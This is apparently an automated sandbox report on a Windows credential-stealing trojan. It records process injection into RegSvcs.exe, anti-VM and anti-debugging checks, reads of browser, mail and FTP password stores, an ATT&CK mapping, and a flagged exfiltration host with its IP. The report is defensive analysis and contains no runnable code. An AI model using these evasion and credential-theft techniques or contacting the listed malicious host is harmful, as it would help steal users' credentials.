                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597940Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: RegSvcs.exe, 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                Source: 4287eV6mBc.exe, 00000000.00000002.1384140537.0000000000DF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: RegSvcs.exe, 00000002.00000002.3804920342.0000000005F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\4287eV6mBc.exeAPI call chain: ExitProcess graph end nodegraph_0-101184
                Source: C:\Users\user\Desktop\4287eV6mBc.exeAPI call chain: ExitProcess graph end nodegraph_0-101250

                Anti Debugging

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF7078 CheckRemoteDebuggerPresent,2_2_02BF7078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00653F09 BlockInput,0_2_00653F09
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005E3B3A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00615A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00615A7C
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E4B37 LoadLibraryA,GetProcAddress,0_2_005E4B37
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00E9B270 mov eax, dword ptr fs:[00000030h]0_2_00E9B270
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00E9C8F0 mov eax, dword ptr fs:[00000030h]0_2_00E9C8F0
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00E9C890 mov eax, dword ptr fs:[00000030h]0_2_00E9C890
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_006380A9
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0060A155
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060A124 SetUnhandledExceptionFilter,0_2_0060A124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A1D008Jump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006387B1 LogonUserW,0_2_006387B1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005E3B3A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005E48D7
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00644C7F mouse_event,0_2_00644C7F
                Source: C:\Users\user\Desktop\4287eV6mBc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\4287eV6mBc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00637CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00637CAF
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0063874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0063874B
                Source: 4287eV6mBc.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 4287eV6mBc.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060862B cpuid 0_2_0060862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00614E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00614E87
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00621E06 GetUserNameW,0_2_00621E06
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00613F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00613F3A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005E49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 4287eV6mBc.exe, 00000000.00000003.1344419786.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, 4287eV6mBc.exe, 00000000.00000002.1384140537.0000000000DF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3802883039.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4287eV6mBc.exe PID: 7316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7408, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: 4287eV6mBc.exeBinary or memory string: WIN_81
                Source: 4287eV6mBc.exeBinary or memory string: WIN_XP
                Source: 4287eV6mBc.exeBinary or memory string: WIN_XPe
                Source: 4287eV6mBc.exeBinary or memory string: WIN_VISTA
                Source: 4287eV6mBc.exeBinary or memory string: WIN_7
                Source: 4287eV6mBc.exeBinary or memory string: WIN_8
                Source: 4287eV6mBc.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4287eV6mBc.exe PID: 7316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7408, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3802883039.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4287eV6mBc.exe PID: 7316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7408, type: MEMORYSTR
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00656283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00656283
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00656747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00656747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                221
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                1
                Exfiltration Over Alternative Protocol
                1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS138
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                2
                Valid Accounts
                LSA Secrets661
                Security Software Discovery
                SSH3
                Clipboard Data
                12
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
                Virtualization/Sandbox Evasion
                Cached Domain Credentials231
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                4287eV6mBc.exe79%ReversingLabsWin32.Trojan.AutoItinject
                4287eV6mBc.exe61%VirustotalBrowse
                4287eV6mBc.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://ftp.jeepcommerce.rs100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                ftp.jeepcommerce.rs
                195.252.110.253
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/line/?fields=hostingfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ftp.jeepcommerce.rsRegSvcs.exe, 00000002.00000002.3802883039.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://account.dyn.com/4287eV6mBc.exe, 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3802883039.0000000002E41000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://ip-api.com/line/?fields=hostinglRegSvcs.exe, 00000002.00000002.3801366079.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://ip-api.comRegSvcs.exe, 00000002.00000002.3802883039.0000000002E41000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                208.95.112.1
                                ip-api.comUnited States
                                53334TUT-ASUSfalse
                                195.252.110.253
                                ftp.jeepcommerce.rsSerbia
                                6700BEOTEL-AShttpwwwbeotelnetRSfalse
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1588971
                                Start date and time:2025-01-11 07:47:29 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 5s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4287eV6mBc.exe
                                renamed because original name is a hash value
                                Original Sample Name:06f6eccac99f9be344bfba51fbccb827405551767d00224ef06c2e2f525f95af.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 54
                                • Number of non-executed functions: 277
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                01:48:26API Interceptor10369640x Sleep call for process: RegSvcs.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                208.95.112.1aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                • ip-api.com/json/
                                DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • ip-api.com/line/?fields=hosting
                                tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • ip-api.com/line/?fields=hosting
                                YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                LfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                • ip-api.com/line/?fields=hosting
                                195.252.110.253juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                    J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                      doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
